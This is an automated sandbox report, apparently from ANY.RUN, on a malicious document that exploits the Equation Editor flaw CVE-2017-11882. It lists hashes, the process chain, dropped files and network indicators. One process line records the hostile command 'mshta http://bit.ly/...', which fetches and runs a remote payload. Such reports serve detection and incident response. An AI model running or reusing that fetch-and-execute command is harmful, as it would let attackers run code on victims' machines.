analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

b8e9bdee8e2f350f5bada4aed4bb7c72c2c7873adb73a4f1ab1a908e7b6a6617

Full analysis: https://app.any.run/tasks/683b10eb-35d8-4f0b-854f-7178ba860c8d
Verdict: Malicious activity
Analysis date: December 02, 2019, 19:32:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
Indicators:
MIME: application/octet-stream
File info: data
MD5:

CC27F1BA805A19B59766615BE600E17E

SHA1:

DACDFFD1F2B9F8238C2F4EA75D33BE813E0B29A7

SHA256:

B8E9BDEE8E2F350F5BADA4AED4BB7C72C2C7873ADB73A4F1AB1A908E7B6A6617

SSDEEP:

1536:yAbfh9AbfhnAbfh9AbfhzAbfh9AbfhBAbfh9AbfhJAbfh9Abfh7xdHoP13Gm+xae:M

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 324)

  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 324)

    • Starts Microsoft Office Application

      • rundll32.exe (PID: 2472)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 324)

    • Creates files in the user directory

      • mshta.exe (PID: 2968)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3032)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3032)

    • Application was crashed

      • EQNEDT32.EXE (PID: 324)

    • Reads internet explorer settings

      • mshta.exe (PID: 2968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start rundll32.exe no specs winword.exe no specs eqnedt32.exe mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
2472"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\b8e9bdee8e2f350f5bada4aed4bb7c72c2c7873adb73a4f1ab1a908e7b6a6617C:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3032"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\b8e9bdee8e2f350f5bada4aed4bb7c72c2c7873adb73a4f1ab1a908e7b6a6617"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
324"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2968mshta http://bit.ly/2TSE6R1 &AAAAAAAAAAAAAAA CC:\Windows\system32\mshta.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
2 136
Read events
1 339
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
3032WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBBC9.tmp.cvr
MD5:
SHA256:
3032WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:07E8DDAF3518B365C0940CBDB81EF258
SHA256:20CF4AD4181CCD39782A9849E3C4B1B4E8CD294DA27162B9A70C8CBD343FCC55
2968mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txttext
MD5:D1478397DE4656BF52AC823B5EBB9FA5
SHA256:54B72253003DC6ADC4215616A41F44D5E10C5B2EE7753EC203574864D1F4348B
3032WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$e9bdee8e2f350f5bada4aed4bb7c72c2c7873adb73a4f1ab1a908e7b6a6617pgc
MD5:CD6A66F9CA96CC8799643F27DA830370
SHA256:88C8B41BCD53AFCAB5814B54D98DB726D015D47EAAC797806D626C45C9A22E20
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2968
mshta.exe
GET
301
67.199.248.10:80
http://bit.ly/2TSE6R1
US
html
118 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2968
mshta.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
posqit.net
unknown

Threats

PID
Process
Class
Message
2968
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
b8e9bdee8e2f350f5bada4aed4bb7c72c2c7873adb73a4f1ab1a908e7b6a6617